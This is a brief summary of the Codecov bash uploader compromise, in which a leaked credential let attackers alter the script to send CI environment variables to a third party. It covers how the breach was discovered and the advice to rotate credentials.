The Codecov software auditing tool was targeted by malicious actors who inserted malicious code into its bash uploader script, allowing them to scrape environment variables and send them to an unknown third party. The intrusion occurred due to a leaked secret credential in a Docker image creation process, which allowed attackers to update the bash uploader script. This malicious code added a line that sent environment variables to an unknown recipient if the script was run as part of a CI process. Codecov discovered the unauthorized access on April 1st after a customer noticed discrepancies between publicly posted and calculated checksums. The issue highlights the importance of provenance and isolation in ensuring software integrity, particularly in Continuous Packaging environments. Affected users are advised to re-roll credentials, tokens, or keys located in environment variables and perform an audit of their use.